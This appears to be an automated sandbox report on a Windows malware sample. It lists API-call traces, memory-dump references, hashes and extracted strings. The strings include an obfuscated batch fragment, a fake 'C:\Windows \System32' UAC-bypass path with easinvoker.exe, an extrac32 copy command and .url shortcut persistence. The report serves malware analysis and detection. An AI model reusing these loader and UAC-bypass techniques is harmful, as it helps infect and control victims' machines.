                                                                                                                              • Opcode Fuzzy Hash: ad32a12dd2a313207f2abf6604a44fcdea95e0bf229231ac431631d10f8221b9
                                                                                                                              • Instruction Fuzzy Hash: 87F0E27E6093243EE622612C5C80EFFA29DCFC27A1F04462DF558E6280EB618804C7B2
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

Control-flow Graph

APIs
• GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 028B7975
• GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 028B797B
• NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 028B799B
Strings
• C:\Windows\System32\ntdll.dll, xrefs: 028B7970
• NtAllocateVirtualMemory, xrefs: 028B796B
Memory Dump Source
• Source File: 00000000.00000002.2028105526.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A0000, based on PE: true
• Associated: 00000000.00000002.2028083587.00000000028A0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_28a0000_XY2I8rWLkM.jbxd
Yara matches
Similarity
• API ID: AddressAllocateHandleMemoryModuleProcVirtual
• String ID: C:\Windows\System32\ntdll.dll$NtAllocateVirtualMemory
• API String ID: 421316089-2206134580
• Opcode ID: 7715d61cb634e5b73a7fca2370174185977837a9fb4fd366eaa443c81ef8b0cb
• Instruction ID: 74d15b728013adabe1b00dcb173907a324d3ef8958db373b1d1b3a996d86855e
• Opcode Fuzzy Hash: 7715d61cb634e5b73a7fca2370174185977837a9fb4fd366eaa443c81ef8b0cb
• Instruction Fuzzy Hash: 34E09ABA64030CBFEB01DEACDC85EEA77ACAB0C611F444415BA19D7205DA74E9508BB9
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph

APIs
• GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 028B7975
• GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 028B797B
• NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 028B799B
Strings
• C:\Windows\System32\ntdll.dll, xrefs: 028B7970
• NtAllocateVirtualMemory, xrefs: 028B796B
Memory Dump Source
• Source File: 00000000.00000002.2028105526.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A0000, based on PE: true
• Associated: 00000000.00000002.2028083587.00000000028A0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_28a0000_XY2I8rWLkM.jbxd
Yara matches
Similarity
• API ID: AddressAllocateHandleMemoryModuleProcVirtual
• String ID: C:\Windows\System32\ntdll.dll$NtAllocateVirtualMemory
• API String ID: 421316089-2206134580
• Opcode ID: fb2a588f65785d1d8c25c56cd1d512b96324af4dea9b87a8bc35d5e689460587
• Instruction ID: 4e32b8d195d01925198652ea0af06ddb006dc1d1608538b07860d39d815c2ed5
• Opcode Fuzzy Hash: fb2a588f65785d1d8c25c56cd1d512b96324af4dea9b87a8bc35d5e689460587
• Instruction Fuzzy Hash: EDE09ABA54030CBFEB01DEACD885EDA77ACAB0C611F444415BA19D7205DA74E5508BB9
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph

APIs
  • Part of subcall function 028A4EE4: SysAllocStringLen.OLEAUT32(?,?), ref: 028A4EF2
• RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,028BC5AC), ref: 028BC517
• NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,028BC5AC), ref: 028BC547
• NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 028BC55C
• NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 028BC588
• NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 028BC591
  • Part of subcall function 028A4C24: SysFreeString.OLEAUT32(028BD42C), ref: 028A4C32
Memory Dump Source
• Source File: 00000000.00000002.2028105526.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A0000, based on PE: true
• Associated: 00000000.00000002.2028083587.00000000028A0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_28a0000_XY2I8rWLkM.jbxd
Yara matches
Similarity
• API ID: File$PathString$AllocCloseFreeInformationNameName_OpenQueryRead
• String ID:
• API String ID: 1897104825-0
• Opcode ID: c2673af6e6d17123c457fd90231afba8861ff19bcbfecf9c61ab504635822c28
• Instruction ID: 0dcf7844a6b309b9e1a9489e9020ae0ac03a6c42b76b23827dae3d7b0f71fbf5
• Opcode Fuzzy Hash: c2673af6e6d17123c457fd90231afba8861ff19bcbfecf9c61ab504635822c28
• Instruction Fuzzy Hash: 96219279A507087EEB11EAD8CC52FDEB7BDAF48700F540466B604E72C0DAB4BA058B65
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph

APIs
• InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 028BC9EA
Strings
Memory Dump Source
• Source File: 00000000.00000002.2028105526.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A0000, based on PE: true
• Associated: 00000000.00000002.2028083587.00000000028A0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_28a0000_XY2I8rWLkM.jbxd
Yara matches
Similarity
• API ID: CheckConnectionInternet
• String ID: Initialize$OpenSession$ScanBuffer
• API String ID: 3847983778-3852638603
• Opcode ID: 8bca162db6eb9b5cac4aab698178f218020805c57a7b2406087bec1aa5940453
• Instruction ID: ac72e9c906e46a091d481e12f712ed87ee479560d3e9dc7ee3551025e403c5c6
• Opcode Fuzzy Hash: 8bca162db6eb9b5cac4aab698178f218020805c57a7b2406087bec1aa5940453
• Instruction Fuzzy Hash: 6B410B3DA102489FFF01EAA8D850EDEB3B6AF49700F205426E041F7351DEB4A9158F51
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph

APIs
  • Part of subcall function 028A4EE4: SysAllocStringLen.OLEAUT32(?,?), ref: 028A4EF2
• RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,028BC4CA), ref: 028BC437
• NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 028BC471
• NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 028BC49E
• NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 028BC4A7
Memory Dump Source
• Source File: 00000000.00000002.2028105526.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A0000, based on PE: true
• Associated: 00000000.00000002.2028083587.00000000028A0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_28a0000_XY2I8rWLkM.jbxd
Yara matches
Similarity
• API ID: FilePath$AllocCloseCreateNameName_StringWrite
• String ID:
• API String ID: 3764614163-0
• Opcode ID: fc0728b822d4c25685fb9af56ea334971e15fa0bd2af9697abdbfdf926e71297
• Instruction ID: d4b42aa5f0d668c47762e90257d7e49c8a1f7930c00e8ba8297c0679ba9d1af9
• Opcode Fuzzy Hash: fc0728b822d4c25685fb9af56ea334971e15fa0bd2af9697abdbfdf926e71297
• Instruction Fuzzy Hash: 2121E379A40208BEFB11EA94CC52FDEB7BDEF44700F604466B604F71D0D7B46E048A55
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 028A4EE4: SysAllocStringLen.OLEAUT32(?,?), ref: 028A4EF2
• RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,028BC4CA), ref: 028BC437
• NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 028BC471
• NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 028BC49E
• NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 028BC4A7
Memory Dump Source
• Source File: 00000000.00000002.2028105526.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A0000, based on PE: true
• Associated: 00000000.00000002.2028083587.00000000028A0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_28a0000_XY2I8rWLkM.jbxd
Yara matches
Similarity
• API ID: FilePath$AllocCloseCreateNameName_StringWrite
• String ID:
• API String ID: 3764614163-0
• Opcode ID: a0e85ca408c3caab7896abefb1a3df81b045cd00134cfebd5ea9ce561e940206
• Instruction ID: 8cd59467b3eee8e9b61852e63aba4d88c9b788ce0e83bba9ee560c3c916629dd
• Opcode Fuzzy Hash: a0e85ca408c3caab7896abefb1a3df81b045cd00134cfebd5ea9ce561e940206
• Instruction Fuzzy Hash: AA21E179A40208BEEB11EA94CC52FDEB7BDEF44B00F604466B604F72D0DBB46E048A55
Uniqueness
Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                                • Part of subcall function 028A4EE4: SysAllocStringLen.OLEAUT32(?,?), ref: 028A4EF2
                                                                                                                              • RtlInitUnicodeString.N(?,?,00000000,028BC3E2), ref: 028BC390
                                                                                                                              • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,028BC3E2), ref: 028BC3A6
                                                                                                                              • NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,028BC3E2), ref: 028BC3C5
                                                                                                                                • Part of subcall function 028A4C24: SysFreeString.OLEAUT32(028BD42C), ref: 028A4C32
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2028105526.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.2028083587.00000000028A0000.00000002.00001000.00020000.00000000.sdmpDownload File
• Associated: 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_28a0000_XY2I8rWLkM.jbxd
Yara matches
Similarity
• API ID: String$Path$AllocDeleteFileFreeInitNameName_Unicode
• String ID:
• API String ID: 1694942484-0
• Opcode ID: eb4e6052247caa17d509a65b7da48ae84483131401502b1c073851f08906478d
• Instruction ID: 1ab370790abef25bedb2ed918f9bd03a75f652bfae6b53039dc56f564ecea4aa
• Opcode Fuzzy Hash: eb4e6052247caa17d509a65b7da48ae84483131401502b1c073851f08906478d
• Instruction Fuzzy Hash: 8601E57D940208BEEB01EAA4CD51FCD73EDEF4C700FA04466A515E6280EA74AB048A65
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 028B6D28: CLSIDFromProgID.OLE32(00000000,?,00000000,028B6D75,?,?,?,00000000), ref: 028B6D55
• CoCreateInstance.OLE32(?,00000000,00000005,028B6E68,00000000,00000000,028B6DE7,?,00000000,028B6E57), ref: 028B6DD3
Memory Dump Source
• Source File: 00000000.00000002.2028105526.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A0000, based on PE: true
• Associated: 00000000.00000002.2028083587.00000000028A0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_28a0000_XY2I8rWLkM.jbxd
Yara matches
Similarity
• API ID: CreateFromInstanceProg
• String ID:
• API String ID: 2151042543-0
• Opcode ID: 49c5b92381524fae22ebcc502e34f8279918d2fa430ce74dd7368b51cc89bfa8
• Instruction ID: cdcee1ffc15f45e792420e2c95b1a2d1d1b27f909f63602670a49cf478f6042c
• Opcode Fuzzy Hash: 49c5b92381524fae22ebcc502e34f8279918d2fa430ce74dd7368b51cc89bfa8
• Instruction Fuzzy Hash: 3E01D47C6047046EFB06DF65DC229AF7BADEF49B10FA10439F401E2740FA75A910CA65
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 028B9B94: GetModuleHandleA.KERNEL32(kernel32.dll,00000002,028B9E1B,?,?,028B9EAD,00000000,028B9F89), ref: 028B9BA8
  • Part of subcall function 028B9B94: GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 028B9BC0
  • Part of subcall function 028B9B94: GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 028B9BD2
  • Part of subcall function 028B9B94: GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 028B9BE4
  • Part of subcall function 028B9B94: GetProcAddress.KERNEL32(00000000,Heap32First), ref: 028B9BF6
  • Part of subcall function 028B9B94: GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 028B9C08
  • Part of subcall function 028B9B94: GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 028B9C1A
  • Part of subcall function 028B9B94: GetProcAddress.KERNEL32(00000000,Process32First), ref: 028B9C2C
  • Part of subcall function 028B9B94: GetProcAddress.KERNEL32(00000000,Process32Next), ref: 028B9C3E
  • Part of subcall function 028B9B94: GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 028B9C50
  • Part of subcall function 028B9B94: GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 028B9C62
  • Part of subcall function 028B9B94: GetProcAddress.KERNEL32(00000000,Thread32First), ref: 028B9C74
  • Part of subcall function 028B9B94: GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 028B9C86
  • Part of subcall function 028B9B94: GetProcAddress.KERNEL32(00000000,Module32First), ref: 028B9C98
  • Part of subcall function 028B9B94: GetProcAddress.KERNEL32(00000000,Module32Next), ref: 028B9CAA
  • Part of subcall function 028B9B94: GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 028B9CBC
  • Part of subcall function 028B9B94: GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 028B9CCE
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 028B9E21
Memory Dump Source
• Source File: 00000000.00000002.2028105526.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A0000, based on PE: true
• Associated: 00000000.00000002.2028083587.00000000028A0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_28a0000_XY2I8rWLkM.jbxd
Yara matches
Similarity
• API ID: AddressProc$CreateHandleModuleSnapshotToolhelp32
• String ID:
• API String ID: 2242398760-0
• Opcode ID: 5ff9c8668c04de50a6fb2288474f62c7e68611a653c35591d5a7f667942963ba
• Instruction ID: 8ad5f602fed95c9723c607d491b7cc43517a0f54569601d92920e0d39c40af0e
• Opcode Fuzzy Hash: 5ff9c8668c04de50a6fb2288474f62c7e68611a653c35591d5a7f667942963ba
• Instruction Fuzzy Hash: AAC0806A61113017CB1066F82CC84D7574DDD4D0B77150462F60DD3201E3554C1059A0
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 028B7BE8: LoadLibraryW.KERNEL32(?,00000000,028B7C9A), ref: 028B7C18
  • Part of subcall function 028B7BE8: GetModuleHandleW.KERNEL32(?,?,00000000,028B7C9A), ref: 028B7C1E
  • Part of subcall function 028B7BE8: GetProcAddress.KERNEL32(00000000,00000000), ref: 028B7C37
  • Part of subcall function 028BC3F8: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,028BC4CA), ref: 028BC437
  • Part of subcall function 028BC3F8: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 028BC471
  • Part of subcall function 028BC3F8: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 028BC49E
  • Part of subcall function 028BC3F8: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 028BC4A7
  • Part of subcall function 028A7E18: GetFileAttributesA.KERNEL32(00000000,?,028BE0EE,ScanString,02905344,028C8FEC,OpenSession,02905344,028C8FEC,ScanString,02905344,028C8FEC,UacScan,02905344,028C8FEC,UacInitialize), ref: 028A7E23
• Sleep.KERNEL32(00001770,UacScan,02905344,028C8FEC,ScanString,02905344,028C8FEC,OpenSession,02905344,028C8FEC,ScanBuffer,02905344,028C8FEC,OpenSession,02905344,028C8FEC), ref: 028C3094
  • Part of subcall function 028BC368: RtlInitUnicodeString.N(?,?,00000000,028BC3E2), ref: 028BC390
  • Part of subcall function 028BC368: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,028BC3E2), ref: 028BC3A6
  • Part of subcall function 028BC368: NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,028BC3E2), ref: 028BC3C5
• WinExec.KERNEL32(00000000,028C9524), ref: 028C436D
Strings
Memory Dump Source
• Source File: 00000000.00000002.2028105526.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A0000, based on PE: true
• Associated: 00000000.00000002.2028083587.00000000028A0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_28a0000_XY2I8rWLkM.jbxd
Yara matches
Similarity
• API ID: FilePath$NameName_$AddressAttributesCloseCreateDeleteExecHandleInitLibraryLoadModuleProcSleepStringUnicodeWrite
• String ID: .url$@echo offset "Nnqr=set "%Nnqr%"njyC=="%Nnqr%"qkMvMLsfma%njyC%http"%Nnqr%"dbvWEsxWns%njyC%rem "%Nnqr%"NpzRZtRBVV%njyC%Cloa"%Nnqr%"ftNVZzSZxa%njyC%/Bat"%Nnqr%"TwupSEtIWD%njyC%gith"%Nnqr%"yIGacXULig%njyC%k"%Nnqr%"uGlGnqCSun%njyC%h2sh"%Nnqr%"FU$C:\Users\Public\$C:\Users\Public\alpha.exe$C:\Windows \System32\NETUTILS.dll$C:\Windows \System32\aaa.bat$C:\Windows \System32\easinvoker.exe$C:\\Users\\Public\\Libraries\\$C:\\Windows\\System32\\extrac32.exe /C /Y $HotKey=$IconIndex=$Initialize$O.bat$OpenSession$ScanBuffer$ScanString$URL=file:"$UacInitialize$UacScan$[InternetShortcut]$a.bat$er.e$s.d
• API String ID: 102611719-2667577771
• Opcode ID: b12c4e4c5c14fe103cbc1102f646cbdce927c824a992972dd4b8e9dfcdb1e3ce
• Instruction ID: 909d31e07a9a5a92cd5be8758719f442ce25fff2ef57693f226e79087b60bc88
• Opcode Fuzzy Hash: b12c4e4c5c14fe103cbc1102f646cbdce927c824a992972dd4b8e9dfcdb1e3ce
• Instruction Fuzzy Hash: 1A530E3DA502588FEF11EB68D890EADB3B6BB45700F2444E5A009E7754DFB0AE85CF52
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph
• Executed
• Not Executed
(Control-flow graph image for the function at 28c4efe not reproduced; the raw node and edge listing is omitted.)
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 028B7BE8: LoadLibraryW.KERNEL32(?,00000000,028B7C9A), ref: 028B7C18
                                                                                                                                • Part of subcall function 028B7BE8: GetModuleHandleW.KERNEL32(?,?,00000000,028B7C9A), ref: 028B7C1E
                                                                                                                                • Part of subcall function 028B7BE8: GetProcAddress.KERNEL32(00000000,00000000), ref: 028B7C37
                                                                                                                                • Part of subcall function 028BD318: RegOpenKeyA.ADVAPI32(?,00000000,02905798), ref: 028BD35C
                                                                                                                                • Part of subcall function 028BD318: RegSetValueExA.ADVAPI32(00000870,00000000,00000000,00000001,00000000,0000001C,00000000,028BD3C7), ref: 028BD394
                                                                                                                                • Part of subcall function 028BD318: RegCloseKey.ADVAPI32(00000870,00000870,00000000,00000000,00000001,00000000,0000001C,00000000,028BD3C7), ref: 028BD39F
                                                                                                                              • WinExec.KERNEL32(00000000,00000000), ref: 028C57F9
                                                                                                                                • Part of subcall function 028B9E70: CompareStringA.KERNEL32(00000400,00000001,00000000,?,00000000), ref: 028B9F33
                                                                                                                              • RtlMoveMemory.N(00000000,00000004,00000000,?,ScanBuffer,02905344,028C8FEC,UacScan,02905344,028C8FEC,OpenSession,02905344,028C8FEC,OpenSession,02905344,028C8FEC), ref: 028C5D7B
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2028105526.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.2028083587.00000000028A0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_28a0000_XY2I8rWLkM.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: AddressCloseCompareExecHandleLibraryLoadMemoryModuleMoveOpenProcStringValue
                                                                                                                              • String ID: C:\Users\Public\$C:\Windows\System32\$Initialize$OpenSession$ScanBuffer$ScanString$UacInitialize$UacScan
                                                                                                                              • API String ID: 897696978-872072817
                                                                                                                              • Opcode ID: 6a109a0dbd2517aab2ed5b4b6ed7a3f8b87bad5c65431683da53aad80fb34353
                                                                                                                              • Instruction ID: e722111b739eafcd5022214d07d12906e64ae0d88fc712fc4db56fe8122127d8
                                                                                                                              • Opcode Fuzzy Hash: 6a109a0dbd2517aab2ed5b4b6ed7a3f8b87bad5c65431683da53aad80fb34353
                                                                                                                              • Instruction Fuzzy Hash: 4F921C3DA542588FEF11EB68D8909DDB3B6AF89700F2084E5A149E7354DFB0AE85CF41
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              • Sleep.KERNEL32(00000000,?,028A1FC1), ref: 028A17D0
                                                                                                                              • Sleep.KERNEL32(0000000A,00000000,?,028A1FC1), ref: 028A17E6
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2028105526.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.2028083587.00000000028A0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_28a0000_XY2I8rWLkM.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Sleep
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3472027048-0
                                                                                                                              • Opcode ID: 9557bdb2f0afba213b7dad5a670953ea3976005cb389cc8df0f5ea9733c373f3
                                                                                                                              • Instruction ID: b6d7b1859fe220f6f63efae3dead47effa94aaaf3c715718416c65ddf12ad661
                                                                                                                              • Opcode Fuzzy Hash: 9557bdb2f0afba213b7dad5a670953ea3976005cb389cc8df0f5ea9733c373f3
                                                                                                                              • Instruction Fuzzy Hash: 08B1127EA052548FE715CF2CD4E8365BBE1EB85364F18866ED80DCB389CB70A451CB91
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              • GetModuleHandleA.KERNEL32(kernel32,00000000,00000000,028B7BA5,?,?,00000000,00000000), ref: 028B7B61
                                                                                                                              • GetProcAddress.KERNEL32(00000000,kernel32), ref: 028B7B67
                                                                                                                              • VirtualProtect.KERNEL32(?,?,?,?,00000000,kernel32,00000000,00000000,028B7BA5,?,?,00000000,00000000), ref: 028B7B81
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2028105526.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.2028083587.00000000028A0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_28a0000_XY2I8rWLkM.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                              • String ID: irtualProtect$kernel32
                                                                                                                              • API String ID: 2099061454-2063912171
                                                                                                                              • Opcode ID: e5aa2c2a7ef152619f8373fc908043ce86fdf3e52841802536f3522aaf0a74a3
                                                                                                                              • Instruction ID: 446cce8b1ad4ca146ec905d42ebbe1bcc052f52526a694205ee94e9baaf12ce1
                                                                                                                              • Opcode Fuzzy Hash: e5aa2c2a7ef152619f8373fc908043ce86fdf3e52841802536f3522aaf0a74a3
                                                                                                                              • Instruction Fuzzy Hash: 5001217D604348AFEB01EFA8DC51EAAF7EDEF88710F654464B504E3780DA74AA108E25
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              • Sleep.KERNEL32(00000000,?), ref: 028A1B17
                                                                                                                              • Sleep.KERNEL32(0000000A,00000000,?), ref: 028A1B31
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2028105526.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.2028083587.00000000028A0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_28a0000_XY2I8rWLkM.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Sleep
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3472027048-0
                                                                                                                              • Opcode ID: 2ceaa96dde7d7cdd782c3014018830d0f99b6a8d8cc97d844fdd55fbe8121a58
                                                                                                                              • Instruction ID: 20eab296e3287392e7378392905eb18ab9cfc9b3c758e45a972c3a0bc91e23cd
                                                                                                                              • Opcode Fuzzy Hash: 2ceaa96dde7d7cdd782c3014018830d0f99b6a8d8cc97d844fdd55fbe8121a58
                                                                                                                              • Instruction Fuzzy Hash: 7A51DF7DA062408FF715CF6C89D8766BBD4AF45314F1881AED84CCB286EB60E446CB92
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 028BC9EA
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2028105526.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.2028083587.00000000028A0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                              • Associated: 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_28a0000_XY2I8rWLkM.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: CheckConnectionInternet
                                                                                                                              • String ID: Initialize$OpenSession$ScanBuffer
                                                                                                                              • API String ID: 3847983778-3852638603
                                                                                                                              • Opcode ID: 69da396a7aa09e955e0d409f0a66ece5f1a5d63a3d1e6f40ae2c9a8ae212f697
                                                                                                                              • Instruction ID: 001a4de5c3ee2856881a1c5dadf9d09fb1a7d5406c932c0b7acd2b6e5c606cfc
                                                                                                                              • Opcode Fuzzy Hash: 69da396a7aa09e955e0d409f0a66ece5f1a5d63a3d1e6f40ae2c9a8ae212f697
                                                                                                                              • Instruction Fuzzy Hash: B6410A3DA102489FFF01EAA8D850EEEB3B6AF49700F205426E041F7351DEB4A9158F51
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              APIs
                                                                                                                              • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,028B5D30,?,?,028B38BC,00000001), ref: 028B5C44
                                                                                                                              • GetLastError.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,028B5D30,?,?,028B38BC,00000001), ref: 028B5C72
